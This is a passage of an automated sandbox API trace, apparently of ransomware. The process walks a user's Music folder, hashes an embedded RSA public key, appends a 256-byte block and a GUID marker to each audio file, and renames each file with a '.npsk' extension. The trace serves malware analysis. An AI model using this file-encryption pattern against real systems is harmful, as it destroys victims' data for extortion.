CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.678] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.678] GetLastError () returned 0x0 [0217.678] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.678] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.678] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.678] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.678] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.679] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.679] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x118bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.679] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.679] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.679] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.680] CloseHandle (hObject=0x61c) returned 1 [0217.681] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\3QWG9KFA2sO0gs-vF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\3qwg9kfa2so0gs-vf.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\3QWG9KFA2sO0gs-vF.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\3qwg9kfa2so0gs-vf.mp3.npsk")) returned 1 [0217.682] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0285a10, ftCreationTime.dwHighDateTime=0x1d5e213, ftLastAccessTime.dwLowDateTime=0x344137c0, ftLastAccessTime.dwHighDateTime=0x1d5e710, ftLastWriteTime.dwLowDateTime=0x344137c0, ftLastWriteTime.dwHighDateTime=0x1d5e710, nFileSizeHigh=0x0, nFileSizeLow=0x118ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4x0dcr4Ev.mp3", cAlternateFileName="4X0DCR~1.MP3")) returned 1 [0217.682] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\4x0dcr4Ev.mp3") returned=".mp3" [0217.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\4x0dcr4Ev.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\4x0dcr4ev.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.684] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=71882) returned 1 [0217.684] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.685] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x118a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.685] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.687] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x118ca, lpOverlapped=0x0) returned 1 [0217.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.688] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.689] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.689] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.689] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.689] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.689] GetLastError () returned 0x0 [0217.689] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.689] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.689] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.689] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.689] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.689] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.690] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x118ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.690] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.690] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.690] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.690] CloseHandle (hObject=0x61c) returned 1 [0217.691] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\4x0dcr4Ev.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\4x0dcr4ev.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\4x0dcr4Ev.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\4x0dcr4ev.mp3.npsk")) returned 1 [0217.693] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d3abc0, ftCreationTime.dwHighDateTime=0x1d5ddeb, ftLastAccessTime.dwLowDateTime=0xa4cb3f60, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0xa4cb3f60, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x712, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aJioNpgiVHK9ZkQfPl.wav", cAlternateFileName="AJIONP~1.WAV")) returned 1 [0217.693] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\aJioNpgiVHK9ZkQfPl.wav") returned=".wav" [0217.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\aJioNpgiVHK9ZkQfPl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\ajionpgivhk9zkqfpl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.693] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1810) returned 1 [0217.693] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.695] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.695] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.697] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x712, lpOverlapped=0x0) returned 1 [0217.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.697] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.698] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.698] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.698] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.698] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.698] GetLastError () returned 0x0 [0217.698] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.698] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.698] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.698] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.698] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.698] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.699] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x712, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.699] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.699] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.699] CloseHandle (hObject=0x61c) returned 1 [0217.700] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\aJioNpgiVHK9ZkQfPl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\ajionpgivhk9zkqfpl.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\aJioNpgiVHK9ZkQfPl.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\ajionpgivhk9zkqfpl.wav.npsk")) returned 1 [0217.702] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a406e0, ftCreationTime.dwHighDateTime=0x1d5daa8, ftLastAccessTime.dwLowDateTime=0xc1f9f610, ftLastAccessTime.dwHighDateTime=0x1d5daa9, ftLastWriteTime.dwLowDateTime=0xc1f9f610, ftLastWriteTime.dwHighDateTime=0x1d5daa9, nFileSizeHigh=0x0, nFileSizeLow=0x174fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CJZ6k.mp3", cAlternateFileName="")) returned 1 [0217.702] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\CJZ6k.mp3") returned=".mp3" [0217.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\CJZ6k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\cjz6k.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.702] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=95483) returned 1 [0217.702] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.704] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x174d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.704] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.705] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x174fb, lpOverlapped=0x0) returned 1 [0217.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.706] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.707] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.707] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.707] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.707] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.707] GetLastError () returned 0x0 [0217.707] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.707] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.707] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.707] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.708] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.708] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.709] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x174fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.709] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.709] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.709] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.709] CloseHandle (hObject=0x61c) returned 1 [0217.711] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\CJZ6k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\cjz6k.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\CJZ6k.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\cjz6k.mp3.npsk")) returned 1 [0217.713] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25aef10, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x50a275e0, ftLastAccessTime.dwHighDateTime=0x1d5db18, ftLastWriteTime.dwLowDateTime=0x50a275e0, ftLastWriteTime.dwHighDateTime=0x1d5db18, nFileSizeHigh=0x0, nFileSizeLow=0x711a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mwxtzhqsL3Do.m4a", cAlternateFileName="MWXTZH~1.M4A")) returned 1 [0217.713] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\mwxtzhqsL3Do.m4a") returned=".m4a" [0217.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\mwxtzhqsL3Do.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\mwxtzhqsl3do.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.713] 